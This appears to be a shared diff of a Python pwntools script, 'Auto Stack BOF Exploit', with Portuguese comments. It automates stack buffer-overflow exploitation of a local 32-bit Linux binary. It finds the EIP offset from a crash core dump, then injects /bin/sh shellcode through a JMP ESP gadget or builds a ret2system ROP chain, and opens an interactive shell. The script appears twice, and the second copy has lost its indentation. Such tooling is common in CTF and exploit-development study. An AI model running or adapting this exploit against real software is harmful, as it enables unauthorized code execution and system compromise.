marcostolosa · September 9, 2025 20:12
diff --git a/bof.py b/bof.py
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 #
 # Auto Stack BOF Exploit
 # by Marcos 'Tr0p' Tolosa

 from pwn import *
 import argparse, sys


 parser = argparse.ArgumentParser(description="Auto BOF Exploit (pwntools)")
 parser.add_argument("-f", "--file", required=True, help="Binário alvo (ex: ./vuln)")
 parser.add_argument("-d", "--debug", action="store_true", help="Anexar GDB")
 args = parser.parse_args()

 binary_path = args.file
 binary = ELF(binary_path, checksec=True)

 context.clear(arch="i386", os="linux")
 context.log_level = "info"

 io = gdb.debug(binary_path) if args.debug else process(binary_path)
 log.info(f"Carregado: {binary_path}")

 pattern = cyclic(1024)
 io.sendline(pattern)
 io.wait()                       # espera crash
 core = io.corefile              # pega core dump

 eip_value = core.eip            # valor do EIP sobrescrito
 offset = cyclic_find(eip_value) # descobre offset automaticamente
 log.success(f"Offset descoberto: {offset}")

 if not binary.nx:
    log.info("NX está DESLIGADO → injetando shellcode direto")
    # Procurar um gadget JMP ESP
    opcode = asm("jmp esp")
    try:
        jmp_esp = next(binary.search(opcode))
        log.success(f'JMP ESP encontrado em 0x{jmp_esp:x}')
    except StopIteration:
        log.error("Nenhum JMP ESP encontrado. Abortando.")
        sys.exit()

    payload  = b"A" * offset
    payload += pack(jmp_esp)
    payload += asm(shellcraft.sh())  # shellcode inline

 else:
    log.info("NX está LIGADO → montando ROP chain (ret2system)")
    rop = ROP(binary)
    try:
        binsh = next(binary.search(b"/bin/sh\x00"))
        system = binary.symbols['system']
        exit = binary.symbols['exit']
        payload  = b"A" * offset
        payload += rop.chain([system, exit, binsh])
        log.success("ROP chain criada com system('/bin/sh')")
    except:
        log.error("Falhou em montar ROP chain automática")
        sys.exit()

 io = process(binary_path)
 io.sendline(payload)
 io.interactive()
	#!/usr/bin/env python3
	# -- coding: utf-8 --
	#
	# Auto Stack BOF Exploit
	# by Marcos 'Tr0p' Tolosa

	from pwn import *
	import argparse, sys


	parser = argparse.ArgumentParser(description="Auto BOF Exploit (pwntools)")
	parser.add_argument("-f", "--file", required=True, help="Binário alvo (ex: ./vuln)")
	parser.add_argument("-d", "--debug", action="store_true", help="Anexar GDB")
	args = parser.parse_args()

	binary_path = args.file
	binary = ELF(binary_path, checksec=True)

	context.clear(arch="i386", os="linux")
	context.log_level = "info"

	io = gdb.debug(binary_path) if args.debug else process(binary_path)
	log.info(f"Carregado: {binary_path}")

	pattern = cyclic(1024)
	io.sendline(pattern)
	io.wait() # espera crash
	core = io.corefile # pega core dump

	eip_value = core.eip # valor do EIP sobrescrito
	offset = cyclic_find(eip_value) # descobre offset automaticamente
	log.success(f"Offset descoberto: {offset}")

	if not binary.nx:
	log.info("NX está DESLIGADO → injetando shellcode direto")
	# Procurar um gadget JMP ESP
	opcode = asm("jmp esp")
	try:
	jmp_esp = next(binary.search(opcode))
	log.success(f'JMP ESP encontrado em 0x{jmp_esp:x}')
	except StopIteration:
	log.error("Nenhum JMP ESP encontrado. Abortando.")
	sys.exit()

	payload = b"A" * offset
	payload += pack(jmp_esp)
	payload += asm(shellcraft.sh()) # shellcode inline

	else:
	log.info("NX está LIGADO → montando ROP chain (ret2system)")
	rop = ROP(binary)
	try:
	binsh = next(binary.search(b"/bin/sh\x00"))
	system = binary.symbols['system']
	exit = binary.symbols['exit']
	payload = b"A" * offset
	payload += rop.chain([system, exit, binsh])
	log.success("ROP chain criada com system('/bin/sh')")
	except:
	log.error("Falhou em montar ROP chain automática")
	sys.exit()

	io = process(binary_path)
	io.sendline(payload)
	io.interactive()